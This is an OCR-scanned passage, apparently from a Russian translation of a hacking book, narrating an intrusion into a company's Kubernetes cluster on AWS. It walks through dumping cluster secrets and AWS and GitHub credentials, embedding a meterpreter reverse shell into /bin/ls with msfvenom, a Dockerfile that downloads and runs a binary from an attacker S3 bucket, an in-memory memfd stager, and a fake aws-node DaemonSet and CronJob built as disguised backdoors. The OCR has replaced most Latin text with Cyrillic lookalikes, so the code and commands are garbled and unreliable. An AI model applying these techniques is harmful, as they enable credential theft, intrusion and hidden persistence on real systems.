ргой КаЁКа... амѕ0ѕегКа#Ка Ка#Ка-ёокеп -653се 

ргод айѕ-гёБ... Саѕѕапгарв аеҒац1-ёокеп-сЗіе 
ргод айѕ-гёБ... Саѕѕапгарв аеҒац1-ёокеп-8ес 
ѕадіпд аідіба1... СієћиБВоЁ деҒац1-ёокеп -88#Ғ 
їеѕї Ғ.аѕк... Аџгога0ВТеѕї деҒац1-океп-9134 
- -Сокращено- - 


Да это просто клад! Базы данных Саззапага, ключи доступа АМ, 
учетные записи сервисов, пароли базы данных Аигога, токены СіНирБ, 
другие ключи доступа АМ... это вообще не сон? Давайте же загру- 
зим (и декодируем) каждый секрет с помощью довольно очевидной 
команды КиБес* 1. деї ѕесгеї, как показано ниже: 


ѕһе11> ./КиБесё1 деЕ ѕесгеЁ амѕ0ѕегКаЁКа -о јѕоп -п ргой \ 
| 39 .да+а 
"ассеѕ5_Кеу 14": "АКІД447АК6ИЅ5К05К001", 
"ѕесгеё Кеу 14": "93рірубғЕ10Хпру050%гМ29упЬі990№КА0Р190035" 


ѕһе11> ./КиБесё1 де зесгее діЕһиЬВоЄ -о јѕоп -п ѕЕадіпо\ 
139 „Чака 
"оіЕҺир-Боё- го": "9с13031ааейсдсс3510012сс45ҒҒа#Бе89848020" 


ѕһе11> ./КиБес+1 де зесгее КаҒка-Еокеп-653се -п ргой -о јѕоп | ја -г .даа.океп 
"7Х1КасЈнүгЛРауртухрмуѕрѕхМЬХАмНКМЈМАК1рЅ Кий... 


Полюбуйтесь на все эти учетные данные и токены, которые мы из- 
влекаем! И мы даже не закончили. Фактически мы только начали. Ви- 
дители, это был всего лишь один узел, на котором случайно запустил- 
ся под айѕ-г&Ь с небезопасным контейнером Веа1$. Есть 200 других 
подобных подов, распределенных по 700 машинам, которые уязвимы 
для той же техники отравления кеша. 

Формула такого взлома проста: найдите эти поды (с помощью 
команды де* ройѕ), подключитесь к контейнеру Вейіѕ, замените не- 
сколько ОКІ-адресов УАЅТ на АРІ метаданных, соберите временные 
ключи АМГ5 машины, переданные в базу данных аудита, конвертируй- 
те их в токен Кибегпеез и получите секреты, загруженные подами, 
работающими на узле. 

Повторяем этот цикл для каждого узла и останавливаемся, когда 
замечаем в выводе что-то очень интересное: 


ѕһе11> ./КиБесе\ деф ройѕ -о=сиѕёот- со1итпѕ=\ 

№: .теёада+а.памеѕрасе, \ 

РОО: .теёада+а. паме, \ 

ЕМУ: . ѕрес.сопЕаіпегѕ[*] .епу[* ].уа1џеЕгот. ѕесгеЁКеуВеѓ, \ 

ЕТЬЕЗЕСВЕТ: .ѕрес.уо1итеѕ[*].ѕесгеЁ.ѕесгеЕМате” \ 

- -а\11-памеѕрасеѕ \ 

--Ғіе1й-ѕе1есёог зрес.подеМате=р-192-168-133-34.еи-ме$*-1.сотри{е . 1пегпа\ 
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№ РОр ЕМУ ЕТЕЕЗЕСВЕТ 
® Кибе-ѕуѕёетп ег <попе> {\Цег-{оКеп-Зсеа 
ргой айѕ-г&Б... Саѕѕапгарв аеҒац1-ёокеп-99еа 


Мы удачно наткнулись на узел с номером 192.168.133.34 Ө, кото- 
рый сообщает, что на нем размещено несколько подов, принадлежа- 
щих всемогущему пространству имен КиБе-зуз{ем. Вероятность того, 
что под {і Пег имеет права администратора кластера, близка к 90 %. 
Он играет центральную роль в Вет у2, диспетчере пакетов, использу- 
емом для развертывания и управления приложениями в Киђегпеїеѕ. 
Мы прикидываемся этим узлом и загружаем токен служебного акка- 
унта Е 1Пег: 


гооЁ@Роіпё1:~/# амѕ екѕ ирдае-КибесопЁїд --пате ргод-еци1 --рго Де пойе133 
- -Сокращено- - 

ѕһе11> ./киБесҰ1 де ѕесгеЁ +і1Лег-ёокеп-Зсеа \ 

-о јѕоп \ 

--КиБесоп 19 . /КибБе/сопҒід_133_34 \ 

| 39 -г .даёа. Еокеп 


7Х1Кабэну2 1Ра/рТ\Хрму5р$ХМЭБХВииКММК1р5 )Ку7ХКсСМ2ТИЦ Рац... 


Вооружившись этой мощной учетной записью, мы можем узнать 
все секреты с помощью одной команды. Плевать на авторизацию 
узла! Мы записываем токен учетной записи в действующую конфигу- 
рацию Киђесії, которую назовем Е ЦДег_соп{119, и используем ее для 
запроса кластера: 


ѕһе11> Кибесе1 деф зесге*$ \ 
--а-памезрасе$ \ 

-о јѕоп \ 

--КиБесоп 19 . /КиБе/+11Лег_сопЁід 


"аБёеѕ аЬ иѕег": "аБёеѕ-иѕег-гм", 

"аБёеѕ д6 раѕ5": "а293иИК+ѕиОЈЕрМАМАЗҮӨ" , 

"арі _Жокеп": "аҒЬ87с2Бе3861с1164841Ғ#Ғ5е9с5745", 

"55 теёгісѕ": "--- ВЕСТМ 55Н РАІМАТЕ КЕҮ --- ..." 
"оієћир-Боё- го": "9с13031ааейсдсс3510012сс45ҒҒаҒБе89848020" 


В ответ мы получаем более 100 учетных данных, охватывающих 
почти каждую базу данных: Саѕѕапага, МуЗОГ, что угодно. Если они 
как-то связаны с показом рекламы, будьте уверены, что у нас есть 
способ получить к ним доступ. Мы даже восстановили несколько за- 
крытых ключей 55Н. Пока мы не знаем, как их использовать, но это 
вопрос ближайшего будущего. 

Мы также раздобыли пару действительных ключей доступа к АМ, 
один из которых принадлежит разработчику по имени Кевин Дункан. 
Добавим их в наш файл учетных данных и выполним один вызов АРІ, 
чтобы убедиться, что они действительно работают: 
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гооє@Роіп1:~/# мі -/.ам$ /сгедеп\а1.$ 

[кеуіп] 

амѕ_ассеѕѕ_Кеу ій = АКІА447АК6ИИ55К05К007 
амѕ_ѕесгеЁ_ассеѕ5_Кеу = 93рі0у0Е10Хпру+Ер125ти/5г/+В/-+КЈ 


гооЁ@Роіпї1:~/# амѕ іам деё-иѕег --рго Де Кеуіп 
"Озег": { 

"Ра+ћ": СЕР 

"ОзегМате": "Кеуіп.Яипсап", 

"Агп": "агп:амѕ:1ат: :886371554408 : изег /Ке\ Ап .Чипсап" 


И наконец, мы также обязательно захватим токен СИНиьВ, при- 
надлежащий 9іёһиЬ-Боё- го. Мы убеждаемся, что он все еще дейст- 
вителен, выполняя вызов АРІ при помощи нескольких строк кода 
Руфоп: 


гооЁ@Роіпї1:~/# руЁһоп3 -м рір іпѕёа11 Русі+єһиЬ 
гооЁ@Роіпї1:~/# руЕһоп3 


>>> Ргом 9іЁһиЬ ітрогЕ СіЄһиБ 

>>> 9 = СієћиЬ(“9с13031ааейс0сс3510012сс45ҒҒаҒғЬе89848020”) 
>>> ргіпі(9.деё_иѕег().пате) 

тхгайѕ -БоЁ- го 


Пожалуй, разработчики были правы. Кибегпеѓеѕ – это весело! 

Мы можем с уверенностью сказать, что в настоящее время мы вла- 
деем инфраструктурой доставки контента МХЕ А45. Мы до сих пор 
не знаем, как работает профильный таргетинг или кто является ко- 
нечными клиентами Стеѓіѕсһ Ро1іїіісо, но мы можем изменять, удалять 
и блокировать все их кампании по вторжению в сеть - и, возможно, 
многое другое. 

Прежде чем мы нырнем еще глубже в эту кроличью нору, нам нужно 
закрепить положение, ради которого мы так усердно работали. Кон- 
тейнеры имеют высокую волатильность, что ставит под угрозу наш те- 
кущий доступ. Все, что потребуется, – это новое развертывание прило- 
жения для опросов, чтобы закрыть доступ к нашей оболочке, а вместе 
с ним и нашу главную точку входа в кластер Кибегпеѓеѕ МХК А45. 


Дополнительные ресурсы 


• Дополнительная информация о КВАС в Кибегпеѓеѕ: ћіірѕ;//мууи/.1/9- 
иіамер.сот/Ккр/киретеїеѕ-грас-аиѓћогїғаїіоп/. 


• Основополагающая статья Джона Ламберта о мышлении защитни- 
ка: ћі1рѕ;//дйһиБ.сот/оһпатусС̧/Ѕһагеа. 


• Введение в веб-токены Ј$0М: һр ;//і.1у/35/ТЈур. 


• Справочник по АРІ Кибегпеѓеѕ: ИНр5./Дмиии,.5рагсПоу/сот/аос$/КиВе- 
арі-у1.19.һіті. 
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Список команд Кифес|: А1рѕ;//КиБегеїеѕ.іо/40с5/гејегепсе/депегаїѓей/ 
кирес/киресИ-соттапсб. 

Информация об ОрепО, стандарте аутентификации, используе- 
мом для делегирования аутентификации третьей стороне: №#р$/ 
еуеорегз.опеодт.сот/орет!а-соппеси. 

Роли ІАМ, привязанные к подам: Аћіїрѕ ;//10с5.а/ѕ.атағоп.сот/екѕ/Лаї- 
еѕ1/иѕегдиіае/уогкег поӣе ІАМ гоІе.һіті. 

Документы А\М/5 по управлению группами Аџїѓо 5саЦп для ЕКЅ: 
һїірѕ //атгпо/2шехоь. 

Изучение сетевых политик в Кибегпеез: ^р5;//рапгаісІоий.сот/Ь!од/ 
певмогк-ройсу/. 

Пошаговое руководство по установке Нет и ТШег в кластере Міпі- 
Кибе: лр ;//011.1у/219РВІО. 

Объяснение принципа торгов в реальном времени: ћіїрѕ://2ідіаау. 
сот/теаіадмһаї-іѕ-геа!-їіте-Біааіпд/. 


СТАБИЛЬНЫЙ ДОСТУП 
К КОМАНДНОЙ 
ОБОЛОЧКЕ 


Постоянство приобретает совершенно новый смысл при 

работе с нестабильной и возобновляемой инфраструкту- 

рой, такой как Кибегпе{е$. Контейнеры и узлы, как прави- 

ло, рассматриваются как неизменяемые и одноразовые 
объекты, которые могут исчезнуть в любое время и в лю- 
бом месте. 

Эта нестабильность усугубляется на компьютерах АМ за счет ис- 
пользования особых машин, называемых спотовыми экземплярами 
(5рої іпѕїапсеѕ). Компании могут создавать спотовые экземпляры 
практически любого доступного типа приблизительно за 40 % от 
обычной цены. Загвоздка в том, что АМГ$ может забрать у вас машину 
всякий раз, когда провайдеру потребуется дополнительная вычис- 
лительная мощность. Хотя эта конфигурация кажется идеальной для 
кластера Кибегпеїеѕ, где контейнеры могут автоматически переме- 
щаться на работающие машины, а новые узлы восстанавливаются за 
считанные секунды, она создает серьезные проблемы для надежных 
долгосрочных бэкдоров. 

Раньше для получения устойчивого доступа было достаточно внед- 
рить через бэкдор исполняемый двоичный файл, запустить секрет- 
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ные оболочки на машинах или внедрить ключи Ѕесиге 5Ве! (5$Н). Ни 
один из этих вариантов не обеспечивает стабильного долгосрочного 
доступа в среде, где средний срок службы машины составляет не- 
сколько часов. 

Хорошая новость заключается втом, что использование однихлишь 
спотовых экземпляров для кластера представляет настолько высокий 
риск, что ни одна серьезная компания не формирует такие класте- 
ры - по крайней мере, для обработки критических рабочих нагрузок. 
Если АМГ$ затребует обратно слишком много машин за раз, кластер 
может не успеть выполнить масштабирование, чтобы удовлетворить 
потребности клиентов. По этой причине общепринятой стратегией 
рентабельной устойчивости является планирование стабильной час- 
ти критических рабочих нагрузок на основе минимального количест- 
ва постоянных экземпляров и поглощение колебаний трафика с по- 
мощью спотовых машин. 

Традиционный способ организовать бэкдор в столь изменчивой 
инфраструктуре - найти набор драгоценных постоянных машин 
(обычно это самые старые экземпляры в кластере) и закрепить- 
ся в них старомодными методами. Мы могли бы настроить задание 
сгоп, которое регулярно извлекает и запускает обратную оболочку. 
Мы могли бы использовать внедрение двоичного кода (Ытагу р1ап пе), 
заменяя обычные инструменты, такие как 15, ОосКкег и 55НО, вариан- 
тами, которые выполняют удаленный код, предоставляют привиле- 
гии гоої и выполняют другие вредоносные действия. Мы могли бы 
вставить руткит, содержащий модификацию системы (библиотеки, 
структуры ядра ит. д.), которая разрешает или поддерживает доступ 
(ознакомьтесь с образцом руткита для Шпих на ћі1р5;//9/ћир.сот/сго- 
етһеіаЛкт-гооїКії/). 

В листинге 9.1 мы извлекаем список машин и упорядочиваем его 
по отметке времени их создания. 


Листинг 9.1. Поиск самых старых узлов для обнаружения стабильной 
части кластера 


ѕһе11> ./КиБесЕ\ деЁ пойеѕ -ѕогЕ-Бу=.теЁайа+а. сгеаіопТітеѕЕапр 


Мате 

1р-192-168-162-15.еи-иез{-1.... Веайу 14 дауз 
1р-192-168-160-34.еџ-меѕ-1.... Веайу 14 дауз 
1р-192-168-162-87.еи-меѕ-1.... Веайу 14 дауз 


1р-192-168-162-95.еџ-меѕ-1.... Веайу 12 Чауз 
1р-192-168-160-125.еи-иез{-1.... Веаду 9 дауз 
- - Сокращено- - 


Каждый узел поддерживает разные службы, поэтому бэкдор дю- 
жины таких узлов должен дать нам как минимум несколько дней га- 
рантированного доступа. Оболочка автоматически исчезнет вместе 
с узлом, скрывая любые следы наших махинаций. Это идеальное пре- 
ступление. 
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Точнее, будут похоронены почти все улики. Не все ар- 
тефакты находятся в системе, поэтому мы можем оставить следы 
в журналах потоков виртуального частного облака (ҮРС), фиксирую- 
щих сетевые пакеты, логах СоиТгай, регистрирующих большинство 
вызовов АРІ, и т. д. 


Но что, если нескольких дней недостаточно, чтобы проникнуть 
в сеть Сгеїѕсһ РоПсо? Можем ли мы как-то продержаться дольше? 
В конце концов, мы находимся в системе, которая способна исцелять 
сама себя. Разве не круто было бы автоматически восстанавливать 
бэкдор силами самой жертвы? 

Если мы будем рассматривать наш бэкдор как контейнер или мо- 
дуль, то, возможно, сможем использовать темную магию Кибегпеѓеѕ, 
чтобы гарантировать, что по крайней мере одна копия бэкдора всегда 
где-то запущена и работает. Однако к риску такого подхода нельзя 
относиться легкомысленно. Использование реального модуля Кибег- 
пеѓеѕ для нашего бэкдора - это слишком сложное и масштабное реше- 
ние, чтобы оно долго оставалось незамеченным. 

Устойчивость - это всегда поиск компромисса. Должны ли мы по- 
жертвовать скрытностью ради более надежного доступа или же, на- 
оборот, вести себя очень сдержанно и смириться с потерей нашей 
с трудом завоеванной оболочки при малейшей турбулентности? 
У каждого хакера свое мнение по этому вопросу, и компромисс за- 
висит от нескольких факторов, таких как уверенность в анонимности 
атакующей инфраструктуры, уровень безопасности цели, склонность 
к риску и так далее. 

Однако у этой якобы неразрешимой проблемы есть одно очевид- 
ное решение: несколько бэкдоров с разными свойствами. У нас будет 
как стабильный, но несколько простоватый бэкдор, так и незамет- 
ная, но изменчивая оболочка. Первый бэкдор будет состоять из хит- 
роумно спрятанного на видном месте пода, который действует как 
наш главный оперативный центр. Под будет регулярно подключать- 
ся к нашему домашнему серверу в поисках команд для выполнения. 
Он также обеспечивает прямое подключение к интернету, которого 
нет в нашей текущей оболочке. Всякий раз, когда он по какой-либо 
причине пропадает, Кибегпее$ спешит вернуть его к жизни. Парал- 
лельно с первым бэкдором мы запустим еще одну, более незаметную 
программу, которая будет находиться в спящем режиме, пока мы не 
отправим заранее назначенный сигнал. Это дает нам секретный путь 
обратно в систему, если наш первый бэкдор будет обнаружен любо- 
пытным администратором. 

Уэтих бэкдоров не должно быть общих признаков компрометации: 
они будут связываться с разными ІР-адресами, использовать разные 
методы, запускать разные контейнеры и работать полностью изоли- 
рованно друг от друга. Исследователь, обнаруживший один объект 
с определенными атрибутами, не сможет использовать эту информа- 
цию для поиска других лазеек. Кончина одного бэкдора не должна, 
теоретически, подвергать риску других. 
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Стабильный доступ 


Стабильный бэкдор сможет, например, работать лишь на нескольких 
избранных из сотен доступных узлов. Этот зловредный контейнер бу- 
дет так называемым тонким образом (51іт ітаре), который скачивает 
и выполняет файл во время загрузки. Мы будем использовать Арте, 
минимальный дистрибутив размером около 5 МБ, обычно применяе- 
мый для запуска контейнеров. 

В листинге 9.2 мы начинаем с написания Ооскеге для загрузки 
и запуска произвольного файла в контейнере Арше. 


Листинг 9.2. Ооскегїе для создания контейнера, который скачивает 
и запускает исполняемый файл после загрузки 


#ОоскегҒі1е 
ЕВОМ а1ріпе 
смо ["/Бапу/ѕћ", "-с", 


"идее һ&рѕ: //атагоп-спі -р10діп-еѕѕепіа15.53. атагопамѕ. сот/ гип 
-0 /гооё/гип && сһтоа +х /гооЁ/гип && /гооЁ/гип"] 


Поскольку МХК Ад$ является таким большим поклонником $5, мы 
извлекаем будущий двоичный файл из принадлежащего нам бакета 
53, которую мы коварно назвали атагоп-спі -р1џдіп-еѕѕепіа15 (под- 
робнее об имени позже). 

Двоичный файл (также называемый агентом) может представлять 
собой одну из ваших любимых пользовательских или стандартных 
обратных оболочек. Некоторые хакеры даже не возражают против 
запуска агента теѓегргеѓег на компьютере с Ипих. Как было сказа- 
но в главе 1, созданная нами структура атаки надежна и стабильна, 
и лишь немногие компании удосуживаются инвестировать в дорого- 
стоящие решения по обнаружению конечных точек для защиты своих 
серверов Шпих, особенно на временных машинах в кластере Киђетг- 
пеѓеѕ. Это делает готовые фреймворки, такие как Меазрой, вполне 
приемлемым вариантом. 

Тем не менее мы будем соблюдать осторожность и потратим не- 
сколько секунд на создание надежной полезной нагрузки, которая 
вряд ли наткнется на подводные камни. 

Мы направляемся в нашу лабораторию и создаем бесступенчато- 
го агента теќѓегргеѓег НТТР5. Бесступенчатая полезная нагрузка - это 
полностью автономная полезная нагрузка, для запуска которой не 
требуется загружать дополнительный код из интернета. Агент те- 
{егргеег внедряется непосредственно в исполняемый раздел .ќехї 
бинарного файла ЕГЕ/РЕ по нашему выбору (при условии что в фай- 
ле-носителе достаточно места для него). В листинге 9.5 мы выбираем 
двоичный файл /Біп/15 в качестве носителя и встраиваем в него об- 
ратную оболочку. 
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Листинг 9.3. Встраивание агента теегрге!ег в обычный исполняемый 
файл /іп/5 


гоо@Ро1п{1:-/# роскег гип -1& рһосеап/пѕҒ . /тѕҒуепот -р \ 
11пих/х64/теёегргеїег_геуегѕе_һЕёрѕ \ 

ІН057=54.229.96.173 \ 

ШОАІ= /тѕ# \ 

-х /Біп/15 

ІРОАТ=443 -Ғ е\{ > /орё/Етр/ѕЕадег 


[*] МгісАпо 1046512 Буїеѕ {о /орі/ётр/ѕ#адег... 


Достаточно простая операция. Теперь, вместо того чтобы запус- 
кать этот файл с диска, как любой классический двоичный файл, мы 
инициируем его выполнение исключительно из памяти, чтобы по- 
мешать потенциальным средствам безопасности. Если бы полезная 
нагрузка была обычным шелл-кодом, а не двоичным файлом, нам 
было бы достаточно скопировать его в страницу памяти для чтения/ 
записи/исполнения, а затем перейти к первому байту полезной на- 
грузки. 

Однако поскольку наша полезная нагрузка теїегргеїег_гемегѕе_ 
ВЕЕр$ создает полный двоичный файл ЕІЕ, для загрузки его в память 
нужно проделать дополнительную работу: мы должны вручную за- 
грузить импортированные библиотеки ПШ, и разрешить локальные 
смещения. В дополнительных материалах по ссылкам в конце главы 
рассказано о том, как с этим справиться. К счастью, в Мпих 3.17 по- 
явился инструмент системного вызова мет{ 4, обеспечивающий гораз- 
до более быстрый способ достижения того же результата. 

Этот системный вызов создает виртуальный файл, который пол- 
ностью находится в памяти и ведет себя как обычный файл на диске. 
Используя символическую ссылку на виртуальный файл /ргос/ѕе1#/ 
#1/<1%, мы можем открыть виртуальный файл, изменить его, обре- 
зать и, конечно же, выполнить! 

Операция, которую мы задумали, выполняется в пять шагов: 


1. Зашифруйте полезную нагрузку теѓегргеѓег с помощью опера- 
ции ХОК. 


Сохраните результат в корзине 55. 


Создайте стейджер, который будет загружать зашифрованную 
полезную нагрузку через НТТР$ на целевую машину. 

4. Расшифруйте полезную нагрузку в памяти и инициализируйте 
«анонимный» файл с помощью системного вызова мем{ 4. 

5. Скопируйте расшифрованную полезную нагрузку в файл, пред- 
назначенный только для памяти, а затем запустите его. 


Листинг 9.4 представляет собой сокращенное описание основных 
шагов, которые будет выполнять наш стейджер, - как обычно, полный 
код размещен в архиве файлов. 
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Листинг 9.4. Основные операции стейджера на высоком уровне 


ФРипс таіп() { 
// Скачивание полезной нагрузки меёегргеёег 
даа, егг := деЁ0АГСопёеп&(раЁћ) 


// Расшифровка при помощи операции ХОК 
Яесгурёедраїа := десгур&{Хог(дафа, []Буёе("мегу1опокеу")) 


// Создание анонимного файла в памяти 
па, егг := тетҒа.Сгеаїе() 


// Запись расшифрованной полезной нагрузки в файл 
ЕО. Игіёе(десгуріедраёа) 


// Получение символьной ссылки на файл 
ҒАЛеРаһ := Ғпі. Ѕргіпғ(" /ргос/ѕе#/#а/%", п+Р9.29()) 


// Выполнение файла 
сті := ехес. Соттапа(ҒАЛеРаЁћ) 
оиЕ, егг := ста.Вип() 


Вот и все. Нам не нужно выполнять какие-то непонятные вычис- 
ления смещения, загрузку библиотеки «на ходу», исправление разде- 
лов таблицы компоновки процедур (РІТ) или другие опасные трюки. 
У нас есть надежный стейджер, который выполняет файл исключи- 
тельно в памяти и гарантированно работает на любом последнем 
дистрибутиве Шпих. 

Компилируем код и загружаем его на 53: 


гоої@Роіп1:орё/тр/# амѕ ѕ3Зарі риё-оБјесё \ 
--Кеу гип \ 

--БисКеЕ атагоп-спі-р1идіп-еѕѕепЕіа15 \ 
--Боду . /гип 


Наконец, чтобы напустить еще больше тумана, когда мы создаем 
образ контейнера и помещаем его в наш собственный реестр АМ/5 
ЕСК (ЕСА является эквивалентом Проскег Нир на АМ), мы делаем это 
под видом законного контейнера атағоп-К85-спі: 


гооє@Роіпё1:~/# роскег БиіЛа \ 
-{ 886477354405 .Кг.есг.еџи-меѕЕ-1. атагопамѕ. соп/атагоп-К85-спі:у1.5.3 . 


ЅиссеѕѕҒи11у Би Бе905757@9аа 
биссе$$ Ру адде 886477354405.Кг.есг.еџ-меѕі-1.атагопамѕ . сот/атагоп-К85-спі:у1.5.3 


# Аутентификация в ЕСА 
гоо@Роіпё1:~/# $(ам$ есг деЁ-1одіп --по-іпс\1ийе-етаі1 --гедіоп еџ-меѕ-1) 
гоо@Роіпё1:~/# роскег риѕћ 886477354405 .0Кг.есг.еи-меѕЁ-1. атагопамѕ . сот/амагоп-К85-спі:үу1.5.3 
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Названия поддельного контейнера (атағоп-К85-спі) и бакета 53 
(атагоп-спі-р10діп-еѕѕепёіа15) выбраны не случайно. ЕК$ запуска- 
ет копию аналогичного контейнера на каждом отдельном узле для 
управления сетевой конфигурацией подов и узлов, как мы можем ви- 
деть, если получаем список подов из любого работающего кластера: 


ѕһе11> Кобес деф ройѕ -п Кибе-зуз%ем | дгер амѕ-пойе 


амѕ -пойе- гЬ8п2 1/1 Коиппіпя 0 74 
амѕ -поде-г$991 1/1 Виппіпя 0 23һ 
- -Сокращено- - 


Эти поды с именем ам$-поде-хххх используют официальный образ 
апагоп-К85 -спі, размещенный в собственном репозитории АМҮ. 

Упомянутые поды были созданы объектом раетопЅеї – ресурсом 
Кирегие$, который поддерживает по крайней мере одну копию 
данного пода, постоянно работающую на всех (или некоторых) уз- 
лах. Каждому из этих подов амѕ -пойе назначается служебная учетная 
запись с доступом только для чтения ко всем пространствам имен, 
узлам и подам. И вдобавок все они автоматически монтируют /\аг/ 
гип/ОоскКег. зоск, предоставляя им гоо{-привилегии на хосте. Это иде- 
альное прикрытие. 

Мы создадим почти точную копию этого даетоп5е*. Однако, в отли- 
чие от настоящего, новый раетопЅеї будет получать образ модуля апа- 
20п-К8$-сп1 из нашего собственного репозитория ЕСВ. Ваетоп$е{ ра- 
ботает по умолчанию на всех машинах. Нам не нужно, чтобы тысячи 
обратных оболочек одновременно обращались на домашний сервер, 
поэтому мы нацелимся только на несколько узлов – например, натри 
узла с меткой «Ка а-бгокег-соПесѓог». Это хороший размер популя- 
ции для нашего вредоносного раетопЅеї. 

Следующая команда отображает имена машин вместе с их мет- 
ками: 


ѕһе11> Кобес деф пойеѕ - -ѕһои-1аБе15 
1р-192-168-178-150.еџ-меѕї-1. сотриёе.іпёегпа1 


ѕегүісе=КаЁКа-Бгокег -со1Лесіог, 

Беїа. киБегпеёеѕ .іо/агсһ=атаб4, 

Беба. КиБегпеїеѕ .іо/іпѕёапсе-ёуре=2.ѕта11, Беїа. кибегпеїеѕ.1о/оѕ=1іпих 
1р-192-168-178-150.еи-меѕЁ-1. сотриїе.іпёегпа1 

- -Сокращено- - 

1р-192-168-178-150.еи-имез{-1.сотри{е .1п{егпа\. 

- -Сокращено- - 


Мы выбрали цели. Наша полезная нагрузка готова к использова- 
нию. Следующим шагом является создание объекта раетопЅеї. 

Не нужно искать ҮАМІ-определение раетопЅеї; мы просто делаем 
дамп раепопЅеї, используемый легитимным узлом амѕ -пойе, обнов- 
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ляем поле образа контейнера, чтобы оно указывало на наш собствен- 
ный репозиторий, меняем отображаемое имя (анѕ -пойе-спі вместо 
амѕ -поде), меняем порт контейнера, чтобы избежать конфликта с су- 
ществующим объектом раетопЅеї, и, наконец, добавляем селектор 
меток, соответствующий КаҒКа-Бгокег -со1Лесќог. В листинге 9.5 мы 
повторно отправляем только что измененный файл для планиро- 
вания. 


Листинг 9.5. Создание нашего собственного поддельного Баетоп5еЕ 


ѕһе11> КиБес+1 деф раетопЅеЁ амѕ-пойе -о уат -п КиБе-зузет > амѕ-05-тапіҒеѕі.уапі. 


# Заменяем 
ѕһе11> ѕед 
амагоп-К85 


# Заменяем 
ѕһе11> ѕед 


# Заменяем 
ѕһе11> ѕед 


образ контейнера нашим образом 
-Е “< /ітаде: .*/ітаде: 886477354405.Кг.есг.еџ-меѕЁ-1.атагопамѕ. сот/\ 


-спі:у1.5.3/9” -1 амѕ-й5-мапіҒеѕЕ.уаті. 


имя РаетопЅе+ 
“5/ паме: амѕ-пойе/ пате: амѕ-пойе-спі/9” -1 амѕ-й5-мапіҒеѕё.уамі. 


һоѕЁ и порт контейнера во избежание конфликтов 
-Е “5/РогЕ: [0-9]+/Роге: 12711/9” -1 амѕ-15-тапіҒеѕЕ.уапі 


# Обновляем ключ и значение метки узла 


ѕһе11> ѕед 


ѕһе11> ѕед 


“5/ Кеу: Бе+а.КиБегпе+еѕ.іо\/оѕ/ Кеу: ѕегуісе/9” -1 анѕ-05-тапіҒеѕЕ.уаті 


«“5/ ЛАпих/ Ка#Кка-Бгокег-со\Лес+ог/9” -1 амѕ-5-тапіҒеѕё.уаті. 


После нескольких команд зе наш обновленный манифест готов 
к отправке на сервер АРТ. 

Затем мы возвращаемся к нашему контейнеру Меѓаѕріоії, чтобы 
настроить прослушиватель, обслуживающий полезную нагрузку пе- 
ёегргеїег_геуегѕе һ&Ёрѕ через порт 445, как показано ниже. Этот тип 
полезной нагрузки, конечно же, тот же самый, который мы использо- 
вали в команде тѕЁуепоп в начале данной главы: 


гоої@Роіп&1:~/# роскег рѕ 
СОМТАІМЕВ Ір ІМАСЕ СОММАМО 
8е4адассбеб1 рһосеап/тѕЁ "/БАп/ѕћ -с \ "Апі. ЅҺ\"" 


гооє@Роіп1:~/# роскег аёёасһ 8е4айассбеб1 
гооі@Ғс4030 : /орё/теаѕр1оі+- Ғгатемогк . /тѕЁсопѕо1е 

тѕ# > изе ехр1оіё/ти1 і /Вап ег 

тѕ# тиі /Вапд1ег> ѕеё рау\оай 11пих/х6б4/теёегргеїег_геуегѕе_һЕЁрѕ 
тѕ# тиі /һапд1ег> ѕеё _ІРОВТ 443 

5+ тиі /Һапд1ег> ѕеё НОТ 0.0.0.0 

5+ тиі /Һапд1ег> зе 1ШАТ /тѕ# 

5+ тиі /һапд1ег> ѕеё Ехі0ОпЅеѕѕіоп Ға1ѕе 

$ тиі /һапд1ег> гип -ј 

[*] Ехр10іЄ гоиппіпо аз Баскогоџпа јоБ 3 
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Мы отправляем этот обновленный манифест в кластер, который 
создаст объект раетопЅеї вместе с тремя контейнерами обратной обо- 
лочки: 


ѕһе11> КибесЕ1 -Ғ арр1у -п Кибе-ѕуѕёет амѕ-5-папіҒеѕЁ. уат1. 
даетопѕеЁ.аррѕ/амѕ -пойе-спі сгеаїей 


# Контейнер Меёаѕр1оіё 

[*] ћрѕ://0.0.0.0:443 һапдііпд гедиеѕї Ғгот 34.244. 205.187; 
мефегргефег > деЁџій 

Ѕегүег изегпаме: и19=0, 910=0, еџіа=0, едій=0 


Потрясающе. Узлы могут сломаться, а поды могут быть уничтоже- 
ны, но пока есть узлы с меткой КаЁКа-со1Лесіог -Бгокег, наши дьяволь- 
ские контейнеры будут планироваться снова и снова, воскрешая наш 
бэкдор. В конце концов, кто посмеет сомневаться в том, что поды, 
похожие на Ататоп, явно связаны с важным компонентом кластера 
ЕК5? Безопасность через неизвестность, возможно, не является вы- 
игрышной стратегией защиты, но это золотое правило в наступатель- 
ном мире. 


Мы можем добиться такой же устойчивости, исполь- 
зуя объект Вер\ісаЅеї вместо ОаетопЅеї. Объект Вер\ісаЅеї гаранти- 
рует, что всегда существует фиксированное количество копий данного 
модуля. Мы можем настроить Кер\ісаЅеі так, чтобы он имитировал 
атрибуты и метки набора Баетоп5е* узла АИ. Преимущество этого 
метода в том, что мы можем буквально называть поды ам$-поде вмес- 
то амѕ-пойе-спі, поскольку они будут принадлежать другому объекту 
Киретеіеѕ (Керйсабеё вместо Раетоп5ей). 


Скрытый бэкдор 


Наш стабильный бэкдор очень устойчив и выдержит закрытие узла, 
но он недостаточно скрытный. Под и Ваетоп5е* постоянно работают 
и видны в кластере. Поэтому мы добавляем незаметный бэкдор, ко- 
торый срабатывает лишь время от времени. 

Мы настроили задание сгоп на уровне кластера, которое запускает- 
ся каждый день в 10:00, чтобы оживить под. Мы будем использовать 
учетную запись АМГ$, отличную от той, которая присутствует в раетоп- 
Ѕеї, чтобы гарантировать, что у нас нет общих данных или методов 
между нашими бэкдорами. В листинге 9.6 показан файл манифеста 
задания сгоп. 


Листинг 9.6. Задание сгоп для скрытого бэкдора 


арімегѕіоп: Баёсһ/у1Бе+а1 
Кіпа: СгопјоБ 
теёайаѓа: 
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паме: меЁгісѕ -со1 Лесі 


зрес: 


среде: "0 10 * * *" 
јоБТетр1аѓе: 


ѕрес: 


{етр\а*е: 
ѕрес: 


сопёаіпегѕ: 


- паме: теёгісѕ -со1Лесї 
ітаде: 882347352467 .Кг.есг.еџ-меѕї-1.атагопамѕ . сот/атагоп-теёгісѕ-со1Лесїог 
уо1итеМоипЁѕ: 
- тоипЕРаћ: /маг/гип/роскег.ѕосК 
пате: роскегѕоск 


уо1џтеѕ: 


- паме: Роскегѕоск 
һоѕ&Ра+һ: 
раһ: /маг/гип/роскег.ѕоск 
геѕіагЁРо11су: №еуег 


